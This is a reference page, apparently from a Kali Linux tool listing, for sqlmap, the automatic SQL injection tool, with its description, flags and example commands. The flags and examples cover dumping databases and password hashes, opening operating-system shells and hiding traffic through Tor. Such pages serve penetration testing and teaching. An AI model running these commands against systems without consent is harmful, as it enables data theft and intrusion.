Database Assessmentsqlinjectionwebvulnerabilityenumerationexploitation

sqlmap

Automatic SQL injection tool that detects and exploits SQL injection vulnerabilities in web applications. It allows fingerprinting of the back-end DBMS, enumeration of databases, users, tables, and data dumping.

Description

sqlmap is designed to detect and take advantage of SQL injection vulnerabilities in web applications. Once it identifies SQL injections on the target host, users can perform extensive back-end database management system fingerprinting, retrieve DBMS session user and database information, enumerate users, password hashes, privileges, databases, and dump entire or specific DBMS tables and columns. It also supports running custom SQL statements, reading files on the file system, and gaining operating system access.

Use cases include automated testing for SQL injection flaws in web apps, extracting sensitive data from vulnerable databases, and demonstrating the impact of SQLi vulnerabilities. The tool emphasizes legal use with prior consent and includes a disclaimer about user responsibility for compliance with laws.

Additional components like sqlmapapi provide REST-JSON API server and client functionality for integrating sqlmap capabilities programmatically.

How It Works

sqlmap tests target URLs for SQL injection by sending crafted payloads and analyzing responses for DBMS-specific behaviors across techniques like Boolean-based blind, Error-based, UNION query, Stacked queries, Time-based blind, and Out-of-band. It supports customizable detection levels (1-5) and risk levels (1-3), parameter selection, DBMS forcing, proxies, Tor, and random agents. Upon detection, it enumerates DBMS details, structures, and data using injection points, and can escalate to OS shells or file access via DBMS privileges.

Installation

bash

sudo apt install sqlmap

Flags

-u URL, --url=URLTarget URL (e.g. "http://www.site.com/vuln.php?id=1")

-g GOOGLEDORKProcess Google dork results as target URLs

--data=DATAData string to be sent through POST (e.g. "id=1")

--cookie=COOKIEHTTP Cookie header value (e.g. "PHPSESSID=a8d127e..")

--random-agentUse randomly selected HTTP User-Agent header value

--proxy=PROXYUse a proxy to connect to the target URL

--torUse Tor anonymity network

--check-torCheck to see if Tor is used properly

-p TESTPARAMETERTestable parameter(s)

--dbms=DBMSForce back-end DBMS to provided value

--level=LEVELLevel of tests to perform (1-5, default 1)

--risk=RISKRisk of tests to perform (1-3, default 1)

--technique=TECH..SQL injection techniques to use (default "BEUSTQ")

-a, --allRetrieve everything

-b, --bannerRetrieve DBMS banner

--current-userRetrieve DBMS current user

--current-dbRetrieve DBMS current database

--passwordsEnumerate DBMS users password hashes

--dbsEnumerate DBMS databases

--tablesEnumerate DBMS database tables

--columnsEnumerate DBMS database table columns

--os-shellPrompt for an interactive operating system shell

--os-pwnPrompt for an OOB shell, Meterpreter or VNC

--batchNever ask for user input, use the default behavior

--flush-sessionFlush session files for current target

--wizardSimple wizard interface for beginner users

Examples

Attack the given URL and extract the database names

sqlmap -u "http://192.168.1.250/?p=1&forumaction=search" --dbs

Show basic help message and exit

sqlmap -h

Show advanced help message and exit

sqlmap -hh

Show program's version number and exit

sqlmap --version

Target a specific URL for SQL injection testing

sqlmap -u "http://www.site.com/vuln.php?id=1"

Send POST data for injection testing

sqlmap --data="id=1"

Use specified HTTP Cookie for authenticated testing

sqlmap --cookie="PHPSESSID=a8d127e.."

Use Tor for anonymous connection to target

sqlmap --tor

Updated 2026-04-16kali.org ↗